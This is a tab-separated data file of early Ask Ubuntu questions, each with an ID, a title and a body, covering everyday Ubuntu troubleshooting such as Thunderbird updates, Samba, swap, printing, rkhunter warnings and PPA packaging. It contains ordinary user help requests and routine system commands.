1263	unable to update thunderbird	i recently installed thunderbird 3.1 from some source that was n't the ubuntu repos . i ca n't remember right now where i got it from ( i think it was packaged as a deb ) , but i 'm having a problem when it tries to auto-update . unlike the versions that manage their updates via the repos , this one is supposed to update itself whenever it needs to , which seemed fine , but whenever it tries , it pops up an error : a recommended security and stability update is available , but you do not have the system permissions required to install it . please contact your system administrator , or try again from an account that has permission to install software on this computer . you can always get the latest version of thunderbird at : http : //mozillamessaging.com/en-us/thunderbird is there a way to give tb the permissions it needs short of opening it as root ?
1266	how to set up ubuntu server as a nas ?	i am looking to set up ubuntu server as a headless nas for my home . i would like to have file storage there , as well as a central hub for my mp3s and pictures . what are the best packages out there to handle this ? can someone post a link to a good tutorial or post some tips ? one constraint i have is that it has to be windows 7 friendly . by that i mean the shares and streaming should work for a windows machine .
1269	conky configuration woes	i am having trouble setting up conky to display my google calendar or a basic todo list and various system stats mainly memory and processors activity . i would appreciate the steps to set this up . please and thank you .
1272	sound applet has dissappeared	i recently removed and reinstalled pulseaudio and now i ca n't get my sound applet back on my panel . any ideas how to get it back ?
1273	does anyone have a solution to 10.04 lts not recognizing blank cd/dvds ?	after i upgraded to the latest version , and i 'm fully up to date , i can no longer burn cds or dvds , the os simply will not recognize any blank media . has anyone else been experiencing this and if so have you found a solution ?
1275	how do i get the microphone on a sony vaio cs33g working ?	my sony vaio cs33g microphone is working on windows7 but it does not work on ubuntu , any suggestions ?
1276	when will ubuntu one for windows be released ?	i wanted to know when will the windows version of ubuntu one be available ? does anyone have any information about it ?
1277	how do i configure wifi to log in to wpa at boot time , regardless of user being logged in ?	how do i set a system wide wireless wpa password that starts at boot time , allowing me to ssh in to the machine from outside , for example ? i 'm running mythbuntu . until i log in , wifi does n't connect , so i ca n't use ssh to log in from another computer , for example . when i have auto-login enabled , it asks me to enter my password to unlock my keyring before connecting . i 've tried editing the connection and clicking `` available to all users '' , but then it just does n't connect at all . how do i go about debugging this problem , or how can i configure it totally manually ?
1281	where can i find svg sources of the ubuntu icons ?	i 'm trying to make some modifications to the default ubuntu iconset ( mimetypes and some application icons ) but ca n't seem to find the svg for these files - are svg versions of these available ? if so is it a package or already in my install ?
1283	a fresh install and clean up ?	i started with ubuntu around 3 years ago and have been a dedicated user ever since . during that time i tried out lots of apps , themes , etc . and , i 've updated every version as it has come along so now i 'm running lucid . basically , my system has gotten sort of `` messy '' and i 'm planning a vigorous clean up and a fresh install . my /home is on a separate partition from everything else , so i can preserve that . i want to find and remove unused , unneeded apps ( which i pretty much understand how to do ) . also , i want to get back to the default desktop theme and build back up from there . and other messes surely exist . so , my question is , what is a good , logical plan to clean up and freshly reinstall my system ? ( one note is that i have found many links in searches on this issue . there are many links on this topic and many are out of date . so , it 's gotten rather confusing to say the least . ) thanks .
1285	how can i have multiple terminal sessions through one single ssh connection ?	i have an ubuntu server edition running and i can ssh into it to perform various tasks . what i 'd like is the ability to ssh into my server kick off a server application and then switch to another `` virtual '' session ( with in the same ssh instance ) and run client calls against the service . when i start the service its a blocking call , so i ca n't run client calls against it without firing up anther ssh session , i was hoping there might be a slicker way , something like the ui does with virtual desktops .
1294	how to install relink wireless driver for lg x130 nebook	how to install relink wireless driver for lg x130 netbook in ubuntu 10.04
1298	ubuntu server samba running as root ?	i recently installed ubuntu server10.4 . i selected samba file server from the install menu and everything works fine . the problem is , the samba daemon is running as root which has me a little nervous . i add a 'samba ' group and a user called 'samba ' to that group , but i ca n't get the daemon run under it . mysql from the lamp seems to run as its own user .
1303	why ca n't i click on things ( software-related issue ) ?	after installing both gmameui and the sugar desktop session package i was not able to click on anything inside applications . i can close , minimize , and maximize windows and use the panel and desktop icons but the rest of the system is unusable . i have not deleted the partition in which this system is installed on , but have re-installed ubuntu in a new partition , so if anyone can help me with this , it would still be of use to me .
1304	how do i see my mobile contacts in empathy ?	in pidgin and most other clients for instant messaging i 've used , when my contact is logged in from a mobile phone , the client shows an icon by their name so i can differentiate between these buddies that are online from a phone and buddies that are online from a computer . does empathy have this feature ?
1305	software to sync an ipod that auto converts audio and video to correct format ?	does any software exists that actually convert audio to be fonctionnal on my ipod ( ex : .ogg to .mp3 ) and convert videos to a format working on an ipod ?
1306	how do you change your screen 's color temperature ?	how do i go about changing my laptop 's display 's color temperature ? and i do n't mean through something like the red , green , blue sliders in the nvidia config menu . i 'm talking about like adjusting in degrees , like editing a photo 's white balance . so now i 've found redshift and it 's doing me pretty good . i thought it might be helpful if i out here the command i 'm using . redshift -t 5000:5000 -g .5 by adding this to my start up commands i should be good . i 'm still open to other suggestions , because i 'd like something that actually edited my xorg.conf or something like that .
1307	zune + ubuntu , what are my options ?	i have a zune hd ( do n't ask ) . is there any alternative to using this in ubuntu besides creating a virtual windows environment ( in say virtual box or vmware ) and running the zune software there ?
1308	unity launcher -- is it available as a separate package ?	is the launcher ( side dock ) found in unity available as a stand-alone package that can be added to other desktops ? ( like xfce ) if so , what 's the package name ? and is it available for 10.04 or only 10.10 ?
1317	how to upload package with dependencies to my ppa ?	i made a package for my ppa and uploaded it . it built without any problems . then i made another package that depended on the first and uploaded it . it failed because it could n't find the files in the first package . this leads me to believe that the first package was n't even installed . how can i make sure the first package is installed before it tries to build the second ? the control file for the first package ( libjsoncpp ) : source : jsoncpp priority : extra maintainer : nathan osman build-depends : debhelper ( > = 7 ) standards-version : 3.8.3 section : libs homepage : http : //jsoncpp.sf.net package : jsoncpp-dev section : libdevel architecture : any depends : libjsoncpp ( = $ { binary : version } ) description : json parsing library for c++ jsoncpp is a c++ library that makes it easy to read / write json data . . this package contains the development tools necessary to create applications that use jsoncpp . package : libjsoncpp section : libs architecture : any depends : $ { shlibs : depends } , $ { misc : depends } description : json parsing library for c++ jsoncpp is a c++ library that makes it easy to read / write json data . the control file for the second ( libsopp ) : source : sopp priority : extra maintainer : nathan osman build-depends : debhelper ( > = 7 ) standards-version : 3.8.3 section : libs homepage : http : //stackoverflow.quickmediasolutions.com package : sopp-dev section : libdevel architecture : any depends : libsopp ( = $ { binary : version } ) , jsoncpp-dev description : a c++ library for interfacing with stackexchange sites . so++ is a c++ library that wraps the functionality of the stackoverflow api . it provides access to all of the stackexchange sites . . this package contains the development files necessary to write software that uses so++ . package : libsopp section : libs architecture : any depends : $ { shlibs : depends } , $ { misc : depends } , libjsoncpp description : a c++ library for interfacing with stackexchange sites . so++ is a c++ library that wraps the functionality of the stackoverflow api . it provides access to all of the stackexchange sites .
1318	what is the converse of add-apt-repository ?	you can a new ppa repository with add-apt-repository . how do you remove an added repository ?
1324	automatically copy podcasts onto ipod	i 'd like to be able to plug my 5th gen ipod nano into my ubuntu 10.04 box and have it sync podcasts . i 'd like newly downloaded podcasts to be copied onto the ipod , and played podcasts to be removed from the ipod . i 've tried syncing with : rhythmbox detects the ipod when it 's plugged in , but does n't sync podcasts to it . banshee does n't detect the ipod unless i kill nautilus . it also does n't sync podcasts without intervention . gpodder does n't seem to detect the ipod . it will sync , but only if i tell it to . and it marks podcasts as unheard . the gpo sync commandline app has the same problem . gtkpod does n't detect the ipod . it will sync with intervention , but it syncs podcasts as songs . this feels like a problem that someone else would have encountered by now . how do i get my ubuntu box to sync podcasts with my ipod ?
1325	problems installing ubuntu tweak	i 'm new to ubuntu and loving it already . i installed ubuntu 10.04 lts and want to download and install ubuntu tweak . i followed the following process : system > administrator > synaptic package manager ... that were i ca n't proceed and received an error message : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . e : _cache- > open ( ) failed , please report . what am i to do to rectify this problem , without reinstalling ubuntu regards , hylton
1326	flash does n't work right in firefox . wo n't respond to certain clicks	i installed the flash plugin in firefox , and certain sites do n't do what they should because certain things do n't know they are being clicked on . anything i can do about this ? will another plugin work better ?
1331	how to get a dual boot usb drive to work in vista	hey i managed with the help of a friend to get 10.04 onto a 2tb wd usb drive for dual boot but it does n't want to work on my vista loaded laptop . is there a fix ? i do n't have the choice of erasing vista . the drive works on another ubuntu laptop . i have yet to try it on my dad 's xp machine .
1336	how is ubuntu different from debian ?	ubuntu is a derivative of debian . it uses the same package format . in what ways is ubuntu different from debian ?
1343	installed ubuntu-tweak but there 's no icon	i installed ubuntu tweak , but i do n't see an icon . am i supposed to have a tweak icon somewhere ?
1345	what is the simplest debian packaging guide ?	i went to the ubuntu wiki but got confused , there were too many ways.please tell me an easy guide to debian packaging .
1349	how come power manager settings does not work when computer is under virtual console ?	i was wondering why power events does not work as expected when i 'm using virtual console ( or whatever the thing that appears after ctrl-alt-f1 is called ) . i 've set my laptop to go to sleep when lid is closed and it is working fine when i 'm in graphical interface . but when i switch to virtual console , closed lid just turns the screen off . how it is possible , i thought such low level stuff is controlled by daemons and they do not depend on the type of interface i 'm in ?
1352	how can i tell what date ubuntu was installed ?	is there a command which will output the date that ubuntu ( or any distribution ) was installed ?
1357	how to empty swap if there is free ram ?	when i open a ram-intensive app ( virtualbox set at 2gb of ram ) , some swap space is generally used , depending on what else i have open at the time . however , when i quit that last application , the 2gb of ram is freed up , but the same swap space use remains . for example , right now , about two hours after having closed virtualbox , i have 1.6gb free ram and still 770mb in swap . how can i tell ubuntu to stop using that swap and to revert to using the ram ?
1360	what is the root password in ubuntu ?	i am trying to make java and wireless access available to all the users and it asks for authentication , but my admin account 's password does n't go through . i 'm assuming it 's root , can anyone help me ?
1364	send osd notification messages to all systems on a network	what i 'm trying to do is send caller id ( cid ) information from a system running asterisk+freepbx to all ( 3 ) mythtv frontend systems on my network . i 'd like the cid information to pop-up over top of whatever is going on ( eg , whether it 's on a menu , or playing back a recording ) . eventually there may be other information as well , but for now cid would be a great start . the libnotify-style notifications are fine ( though i probably need to increase text size to make it visible ) . i was thinking something like growl , though this does n't seem to exist for linux . ideally i 'd just be able to do some kind of broadcast to the whole network , eg , from the freepbx system i could run a command like : notify -- broadcast -- title `` incoming call '' `` smith j\n613-555-1234 '' and then on any mythtv frontend , it would appear somewhere on screen . note : there is a mythnotify plugin , which i have used in a previous iteration of my setup , but it has a severe limitation ( i believe based on the way mythtv 's osd stuff works ) that it can only display notifications during video playback : not while in menus . i also remember it being a pain to get displaying properly : it uses xml for messaging then xslt to change to mythtv 's xml format . if you want to display something slightly differently , you have to make a small handful of new xml files and even then getting the `` callerid-from-phonebook.xml '' message to actually render to the ( remote ) `` callerid-from-phonebook-osd.xml '' file for display is some kind of black art .
1366	how can i install ubuntu without removing windows ?	i need my pre-installed version of windows 7 ( or any other version of windows ) , how could i install ubuntu without erasing it ?
1373	installing only ruby 1.9	it seems that if i do an `` sudo apt-get install ruby-full build-essential '' the ruby is installed with version 1.8 . how can i install only version 1.9 ?
1383	how to get eclipse plugins working with software center based installation	i installed eclipse from the software center . then i installed a `` aptana '' plugin by using : help - > install - > new software . the plugin installed and eclipse restarted , but i ca n't see any of the editors that i 'd expect to see . if i try installing the plugin again , eclipse insists that the plugin is already installed , and it is visible under : about eclipse - > installation details - > installed software how do i see my new editor windows ?
1385	how to set up ubuntu as wireless accesspoint ?	how can i set up my wifi to be used as wireless access point on ubuntu server ? i have a local ubuntu server , it has a wireless card in it ( 802.11a/b/g/n ) and i really want to set it up as an 802.11n access point since my normal access point does not support n. it needs to work as a switch as well so i can connect and get dhpc through . edit : i do n't see network manager as a good solution since it depends on a lot of x11 packages , and i do n't want that on a server .
1387	can i use two usb gamepads to play games in fce ultra ?	i want to buy a couple usb game pads to use with nes emulator fce ultra . what i ca n't find out , is if i have two game pads connected , will fceu differentiate between them ? i.e . map each game pad to each player , or will both game pads button a generate the same key code ? btw i 'm looking at the genius maxfire , thanks !
1392	what is the right way to connect to reliance netconnect+ and share the connection via wireless ?	thanks for this great initiative . i have a reliance netconnect datacard ( in india ) which i am trying to setup in ubuntu 10.04 ( lucid ) . i have tried it with the network manager to create a new wireless broadband connection . i have tried all the variations of the protocols etc , but no luck getting it to work . i then installed wvdial and gnome-ppp , using which i am able to connect to the internet quite reliably . i read on many forums that people have been able to connect to reliance netconnect using the network manager directly . if anyone has been able to do this , could you please let me know what setting you used etc ? my modem is huawei , model ec168c . now , my next problem/question : i want to share the internet connection using what is known as `` ad-hoc ( computer-to-computer ) connection '' in windows . does ubuntu support a similar feature ? any tips to do this , and/or links to guides that work would be great ! also , in order to make this work , do i need to have the connection working via `` network manager '' or would it work even if i connected using wvdial ? thanks a lot for your answers and help ! ! do let me know if any more info is needed . cheers , maha
1400	how do i optimize the os for ssds ?	what steps should be taken before/during/after installation of ubuntu on a solid state drive to optimize performance and ensure maximum durability of the drive ?
1403	what 's the state of multi-seat in 10.04 lucid ?	ubuntu used to support multiseat ( that is multiple monitors , multiple keyboards and mice , all hanging off a single computer ) pretty well once upon a time . support was n't an official feature but gdm and xorg both worked . these days , gdm does n't appear support it and while you can downgrade to gdm v2.20 , that introduces new issues for me . is there any other way to get a viable multiseat system up and running ? bonus points for anybody who can tell me if it 's possible to have twinview working at one of the seats .
1414	how to create a permanent `` alias '' ?	if you create an alias for example : alias cls= '' clear '' it exists untill you kill terminall session . when you start a new terminal window the alias does n't exist any more . how to create `` permanent '' alias , one that exists in every terminal session ?
1420	how to start terminal with present working directory as `` home '' instead of default `` root '' ?	when i start my terminal the current working directory is always `` / '' . i want it to start from `` /home/ < username > '' i.e . my home . any solution for this ?
1426	how to increase printers buffer while printing via command line ?	i have a epson stylus p50 usb printer and i need to print many copies ( 50~100 ) of some .prn files created via windows . i can not alter/convert those files ; they need to be printed exactly as they are . i installed the printer with cups and gutenprint drivers for epson r285 ( there is not much difference between the 2 printer models ) . my problem is that printing the prn with lp -d printer_name -n 100 /path/to/file.prn or lpr -p printer_name - # 100 /path/to/file.prn does not work as expected ; randomly the printer stops , in cups i got the error unable to write 9640 bytes on printer_name and the jobs queue happens to be cleared automatically . sometimes , the printer prints 1~2 copies before stopping , but often it stops with the first copy . i guess the problem is that ubuntu expects the printer buffer is bigger than it actually is ... but i really do not know . so , is there a way to increase the printer buffer , or to lower the buffer that ubuntu expects the printer to have ? edit : the error happens even giving just 1 copy .
1436	seamless citrix - full screen	when i log into citrix from my laptop with 10.04 , and click on the windows rdp app to launch , and select full screen , it only fills in between the gnome panels , and adds scroll bars . this does not work well at all . and i 'd love to get a fix ( as a work around i tell citrix to use a full-screen session , not seamless , and this works as expected , but has it 's own usability problems ) logging in on my desktop with ubuntu 10.04 , full screen works correctly . the only difference between the computers is the laptop has intel graphics and the desktop nvidia . thanks !
1437	how should ubuntu be promoted ?	sorry for being a bit subjective but how can we persuade other people we know to use ubuntu ...
1441	why does ubuntu download recommend 32-bit install ?	update for 13.10 : 64-bit version is now the default and 32-bit is labelled `` for machines with less than 2gb ram '' the ubuntu desktop download screen has a pair of radio buttons you use to select whether you wish to download the 32-bit or 64-bit version . the 64-bit version is labeled `` not recommended for daily desktop usage . '' if you have a 64-bit processor , why would you not want to use the 64-bit version of ubuntu ? update for 10.10 : they 've removed the `` not recommended '' label from the 64-bit version and added a `` recommended '' label to the 32-bit version . update for 11.04 : same as 10.10 . update for 12.04 : still says `` recommended '' next to 32-bit version of desktop update for 12.10 : 32-bit version of desktop is still default , says `` recommended '' update for 13.10 : 64-bit version is now the default and 32-bit is labelled `` for machines with less than 2gb ram ''
1442	how to connect my printer to localhost ?	when i try to print , for some reason all the printers i previously had installed have disappeared . i pulled up the `` printing '' dialog , and i see that localhost is `` not connected , '' but when i try to connect , it fails . i have looked this up in various places , but the only two suggestions i 've found have not worked . the first was to put apparmor into a less strict mode , and the second was to reset cups . i 've done both of those things , and to no avail . i just want to print again !
1444	i have problems installing ubuntu 10.04	i tried to update ubuntu 9.10 to 10.04lts . i have several issues and had to go back to ubuntu 9.10 . first issue is the mouse has a drag time even when i click to speed it up . second issue is sometimes the keyboard will freeze up and the last letter i type will repeat for about 20 times as if the key gets stuck then the whole system freezes up and i have to reboot . the third issue is i have dsl and the 10.04 does n't seem to want me on the internet -- in firefox i get server not found and finding software app just sits idle like it is searching for the internet . please help . i love the 9.10 . i have an e-machine t5212 and 320 gb ( replaced the original 200gb after a virus shut down windows xp hard drive ) . the video card is radeon xpress 200 . intel pentium d processor and 1024mb ddr2 . i am new to ubuntu but i have used it for about a year and love it .
1459	how can you monitor internet download usage ?	some broadband providers impose a monthly download limit , charging extra if you go over . it is also quite easy to exceed some of the lower limits just by installing/updating packages and 'normal ' browsing ( which to me includes streaming tv programs and movies ) . this means that you need to limit the amount you use the internet , yet it is hard to know when . the system monitor helps a bit with this by giving a total received/total sent in the networking section of the resources tab . however , this is reset every reboot . it would be good if there was a way to have a monthly total received so you can know how close you are to exceeding your limit and maybe even be given warnings if it looks like you are going to exceed the limits . does anyone know of a way to achieve this ?
1463	how do i stream music to my airtunes ?	i have used pulseaudio , but it sometimes works , sometimes it does not ... also my rhythmbox does n't play the songs sometimes and just hangs there paused . is there a more stable option to stream and listen to music on my airtunes ?
1465	how can i install a dual boot configuration with ubuntu and windows xp ?	first i want to install ubuntu completely , and then i want to install windows xp 64 bit as the 2nd boot os . how can i do this ? currently i am using windows xp as the main os and 2nd boot is ubuntu .
1477	how can huawei ec-1260 ( tata photon ) usb internet device be used to share internet over a home wireless network ?	at home i have a windows desktop - and one of the primary reasons i boot into it is to share my internet connection over the home wireless network . i have a setup of this kind : windows desktop < -- -- -- -- > wireless router < -- -- -- -- > mac/linux laptop ( plugged in usb internet device ) i have configured windows to share its internet connection over the network , using windows internet connection sharing . instead of windows i 'd like to do the same in ubuntu , but i gather that linux does not share internet connections with other pcs like windows does . what alternative do i have on ubuntu ?
1479	is there a preferable way of structuring partitions/mounts for /home/userx	i change linux versions/distributions quite often on one of my computers but i would like to keep my home folder working ( keep configuration and files ) , is there another better solution than making a separate partition for /home ?
1488	is there a way to stream netflix ?	is there a way to stream netflix content to my ubuntu ? answer table of contents 2012 - netflx desktop : http : //askubuntu.com/a/219068/47291 , http : //askubuntu.com/a/222466/47291 2013 - pipelight : http : //askubuntu.com/a/219068/47291 , http : //askubuntu.com/a/352075/47291 2014 - native html5 on 14.04 , 14.10 : http : //askubuntu.com/a/509947/47291 virtural machine : http : //askubuntu.com/a/144005/47291 other ideas explored : moonlight : http : //askubuntu.com/a/144005/47291 emulation : http : //askubuntu.com/a/43228/47291 playon : http : //askubuntu.com/a/1498/47291
1500	can i use banshee from the command line ?	i love banshee media player in general , and i already have an important library of music , which i 've spent a lot of time organizing ( labeling , correcting , etc ) . i also use the command line a lot , so i wonder if there is a way i can control banshee from the command line . as in : next , prev , stop , play , etc in anyway query the banshee database as if using the search box in the gui i was akin to program it myself if there is n't , but that would be another question : )
1501	which flavor of ubuntu ?	this question has historical significance from the ask ubuntu beta . it is not considered a `` constructive '' question , as per the faq . my first question regarded a fresh install on my ubuntu box . some great answers . my housemate has a couple of sun ultra 20 's that are unused . so i made the best box possible using the better components of each . it 's sitting there just waiting to be loaded up with ubuntu . the new system may become my primary machine ; or maybe not ; and will probably be set up as a home server . also , almost certain to install lamp to use as a wordpress and drupal testing platform . at the moment i am undecided as to which version of ubuntu i want to use . the choice is between kubuntu , ubuntu , ubuntu studio , or ubuntu server ( with desktop added ) . kubuntu - basically just to try out and develop knowledge of kde . ubuntu studio - because i like the media tools for photography , video , etc . not sure that this one is even necessary since i can add whatever pkgs i want to ubuntu ubuntu - just because it 's familiar . ubuntu server - and add on a desktop since i 'm more of an artist by nature . my question is , what are the pros and cons of these options ? thanks in advance .
1502	how can i get the r backend for cantor in kubuntu ?	kubuntu can not build cantor with its r backend because r is in the universe repository while cantor ( source pacakge : kdeedu ) is in main , so cantor can not depend on r. is there any way to build my own cantor package that include the r backend ?
1514	how can i give the packages in my ppa an icon ?	when browsing the software center , i noticed that certain packages have icons - like blender , the gimp , etc . how can i give the packages in my ppa an icon ? also , when someone brings up the description of the package , it shows a screenshot . how can i do that too ?
1520	migrating , partitioning , and encrypting plan of attack	right now , i 'm running karmic with an unencrypted home folder sharing a partition with my system files . i 'd like to change all that , but i have no idea where to start . should i move my home folder to its own partition first , to easily perform a clean install ? should i back up my data , repartition my disk , then perform a fresh encrypted install ? i 'm stumped . in what order should i transfer my home folder to its own partition , encrypt my data , and migrate to ubuntu 10.04 to minimize my downtime and protect my data ?
1527	where do i find system sounds ?	after installing gm-notify i see the option of hearing a sound every time a new e-mail arrives in my gmail inbox , but i do n't know where ubuntu ( 10.4 ) stores the system sounds to assign one . any ideas ? thanks .
1528	bashrc or bash_profile ?	i know the difference between the two bash login scripts : .bashrc is run only by `` non-login '' shells . .bash_profile ( or .bash_login or .profile ) is executed by `` login '' shells . does anyone have some good examples of what things that are a better fit for login-only execution , such that i 'd only put them in .bash_profile , but they would n't really make sense in .bashrc ? ( i know most of us source .bashrc out of .bash_profile , so there does n't seem to be much point in the opposite question ... )
1529	how can i highlight pdfs ?	currently i need to highlight certain sections in pdfs . these highlights would need to be saved . what tools are out there to do this on ubuntu ?
1537	rkhunter warning about /etc/.java /etc/.udev /etc/.initramfs	i am running ubuntu 10.04.1 lts . i am running rkhunter to check for rootkits . rkhunter is complaining about the following hidden files and directories . i think these files are not a real problem on my system , but how can i check to see if these files are legitimate files ? [ 07:57:45 ] checking for hidden files and directories [ warning ] [ 07:57:45 ] warning : hidden directory found : /etc/.java [ 07:57:45 ] warning : hidden directory found : /dev/.udev [ 07:57:45 ] warning : hidden directory found : /dev/.initramfs update turns out that these directories are specifically mentioned in /etc/rkhunter.conf , which suggests that this is a frequently asked rkhunter question . from rkhunter.conf : # # allow the specified hidden directories . # one directory per line ( use multiple allowhiddendir lines ) . # # allowhiddendir=/etc/.java # allowhiddendir=/dev/.udev # allowhiddendir=/dev/.udevdb # allowhiddendir=/dev/.udev.tdb # allowhiddendir=/dev/.static # allowhiddendir=/dev/.initramfs # allowhiddendir=/dev/.src-unix # allowhiddendir=/dev/.mdadm
1540	how can i find out if a process is cpu , memory or disk-bound ?	how can i find out if a process is bound to cpu , memory or disk ?
1541	is there any advantage to setting up a personal cloud instead of running a personal server without virtualization ?	i currently have my old pc sitting in my closet being a headless server ( running ubuntu server ) . i use it as a file server , web server , and backup server . ( the hostname is mneme , the greek muse of memory . ) are there any major reasons for me to consider replacing this non-virtualized setup with a personal cloud running on the same or similar hardware ? the major reason i can think of would be separation of services . for example , my backup system and my apache web server have nothing to do with each other directly , so they could run in separate instances . if i want to experiment with some new service ( e.g . set up a personal mail server ) , i could do it in a brand new instance and then later , after the inevitable miserable failure , i can just blow the whole mess away without affecting my other services . is this something that i could do with one or two computers running a personal cloud ? are there other advantages to setting up a personal cloud ?
1552	what fonts are absolutely required ?	is it possible , to wipe all fonts other than truetype fonts ? if so , how ? what fonts are absolutely needed/necessary in a working x environment ?
1557	how to change the color depth ?	i have ubuntu 10.04 installed on a dell c600 and the highest available resolution is 800x600 . from my previous i remember 1024x768 would work after setting the colour depth to 16bit , but there is no xorg.conf in /etc/x11 anymore . so , how can the colour depth be changed on lucid lynx ?
1570	bigben wireless gamepad does not connect	the gamepad is more or less a clone of a xbox controller ( iirc it is even from the same manufacturer ) , labeled pcpadrflx . lsusb lists the receiver as id 1a34:0801. dmesg | grep input reads [ 6880.468415 ] input : acrux rf usb gamepad 8206 as /devices/pci0000:00/0000:00:10.1/usb2/2-2/2-2.3/2-2.3:1.0/input/input17 unfortunately , while the receiver is recognized , the gamepad itself does not connect . usually after pressing a button on it the led would light up once to indicate it has connected , however it just blinks as it does when no receiver is connected at all . so , how can i make the gamepad work ?
1571	how to change the resolution of an ati rage mobility 128 above 800x600 ?	i am quite confident under hardy i only had to change the color depth to 16 , although i ca n't remember which driver ( ati , r128 , fglrx ) i used . i tried ati and r128 ( fglrx seems to crash ) but i still can not increase the screen resolution to 1024x768 , which worked under hardy . what else do i need to do ? is there something i have to add to the monitor section of xorg.conf perhaps ? the notebook is a dell latitude c600 .
1572	how can the rules that determine valid user passwords be changed ?	are there any particular rules on what a valid password is , speaking of length , upper- and lower and/or special characters , numbers , etc . and if so how they can be changed ?
1573	stopping desktopcouch and gwibber-service ?	powertop shows desktopcouch and gwibber-service are not-inconsiderable power-users . i do n't use gwibber or ubuntu one , so can i safely kill these processes ? if so , how could i stop them starting up , especially if my laptop is on battery power ?
1577	moving from bash to zsh	i 'm considering moving from bash to zsh as i often come across posts praising zsh . i 'm an experienced command line user and i 'm assuming the basics are pretty much the same , so i 'm looking for advice to get the benefits of moving , and any gotchas to be aware of . please just give one bit of advice per answer . i 'm looking for bite-size chunks where i can come back and integrate extra bits of info into my shell usage at a steady pace rather than trying to learn it all in one go .
1583	technically speaking , what is different about ubuntu compared to other linux distributions ?	this is a question that 's puzzled me for quite a while ( and refers to the differences between all distributions ) . in my mind , a distribution is : a pre-configured os , with some pre-installed packages , some created by the distribution 's community that are unique to that distribution ( e.g . apt-get ) . i 'm not sure my definition is right as i feel there 's something else . i 'm really interested in setting up my own archlinux distro ( which starts as a very minimal barebones system that you expand yourself ) but feel i need to understand this first .
1596	nasty cpu spikes that are n't connected to any visible processes	really strange issue here . i intermittently keep getting really unpleasant cpu spikes , where the cpu gets to 80-90 % busy across all cores for about 5 minutes . when i look at conky , in htop or system monitor , and sort by % cpu , i ca n't see any process that accounts for this much cpu usage . the only things i 've changed since this started are : i moved to kernel version 2.6.35 ( home compiled , up from 2.6.24-1 ) i installed the nvidia driver 256.44 ( up from 256.34 ) now , i am willing to downgrade either/both of those to find the problem but i 'd prefer to do this as scientifically as possible and find out what is causing the cpu explosion before i downgrade . edit : my precise issue looks like a nvidia regression in their latest driver . other people are getting similar spikes .
1600	yammm equivalent	i 've long used yammm for pulling metadata and thumbnails of my films/rips now i 'm in trouble since switching as i ca n't seem to find any equivalent , the xbmc scrapers have been a disaster ( e.g . i ripped toy story 2 , put it in a folder `` toy story 2 ( 2000 ) and it pulled everything for toystory 3 ) so what apps can you recommend ?
1603	wine users configuration	i 'm rebuilding an ubuntu system and this is a problem that i had on my original installation . the issue is this : in my home account i installed apps into wine and all is good . however , i have a second account that i use for work purposes . so , i open wine in the second account and it turns out that my home account wine apps are not installed . so , basically i had to install the apps into the second user account as well . this is really inefficient since it 's about 600mb worth of apps . ( at the time i was new to linux and did n't have time to do this properly . ) anyway , since i 'm essentially starting over , what i 'd like to do is have wine apps installed and available to multi users . the question : how do i make wine apps available to multiple users ? thanks .
1618	fixing usb drive auto-notify	yesterday i was copying files from sd cards , but at some point they stopped auto-mounting . did n't notice any errors . i can still mount by right-clicking the appropriate file in /dev in konqueror . update : slight correction . the drives never automounted , but i 've stopped getting the notification that a drive is plugged in . what processes should i be checking ? something in device actions ? i 'm using kubuntu 10.04
1620	how to fix unreadable tooltips in eclipse helios ?	this is what a function tooltip looks like for eclipse cdt in ubuntu 10.04 with the default theme : ! there 's nothing in eclipse 's general > appearance > colors and fonts preferences settings . is there an easy fix for these unreadable context sensitive help boxes ?
1624	rhythmbox keeps changing track to a different album	i 'm not sure whats happened but when i try and listen to a song in an album just after the song has finished and should go onto the next track it starts to play stereophonics ( the same album ) rather than the next track , has anyone else had this problem ! ?
1626	how can i run dwarf fortress in text mode ( ncurses ) on my linux vps ?	i installed dwarf fortress on my linux vps to use with dfterm . it 's running ubuntu 10.04 server x86-32 . i 'm fairly certain i have all the dependencies : i 've installed : ncurses ncursesw libsdl libsdl-image libgtk libglu libopenal1 i had to turn sound off or it will instantly segfault , and i set the display mode to text . i 've made no other changes to the config . however , even before i go near dfterm , it wo n't run properly . it just displays a blank screen . what could be causing this ? is there a dependency i missed ? is there something else i should have changed in the config ? given that it is a server , there is a good chance that if there is a missing dependency , it 's something that the devs went `` sure , everyone has that '' and did n't bother to list . other ncurses applications ( vim , irssi use it , i think ? ) work fine .
1629	occasional excessive iowait freezes computer - how to diagnose ?	i have a very slow ssd on an eeepc900a , and it occasionally freezes the os ( even the mouse pointer ) with system monitor showing excessive iowait . how can i diagnose what is causing this and should the system allow it ? thanks .
1637	good filesystem for /tmp ?	i 'm thinking of having /tmp on its own partition ... what would be a good filesystem to format it with ? the reason i ask is because the data being stored in /tmp is not permanent , so i do n't need journaling , a fancy index , or anything .
1644	mounting a usb disk in a permanent location	i have a usb hard disk that i want to mount on boot and in a specific location . how can i make that drive mount and stay available ( say for local backups , etc . ) even though no one 's logged in ? it seems that udev or something similar grabs hold of the disk . if i put an entry in /etc/fstab that tries to specifically mount this disk ( by uuid ) , then that mount process and the udev mount process seem to end up in a battle with each other and the disk does n't get mounted .
1647	support for various features in gedit	i 'm trying to use gedit as my main editor , and am looking for help with some tricky features . for each of the following , can people help me out with how to install and configure the feature ? code folding pylint support splitview support spell check whitespace deletion regex-powered find and replace any other features i should know about ? tags : plugins , ide
1649	lightroom alternative ?	what is the best alternative to adobe lightroom on linux/ubuntu ?
1656	nautilus automatically browses as root	i used gksudo nautilus ( not through the terminal but through the 'open with ' command ) for some copy & paste stuff that requires root access . but now whenever i open the file browser ( nautilus ) to access my local folder , it does n't open normally , but opens with root access as if i had used gksudo nautilus again . only trash is able be to opened normally without any root access . how can i get back the normal , unprivileged behavior for nautilus ?
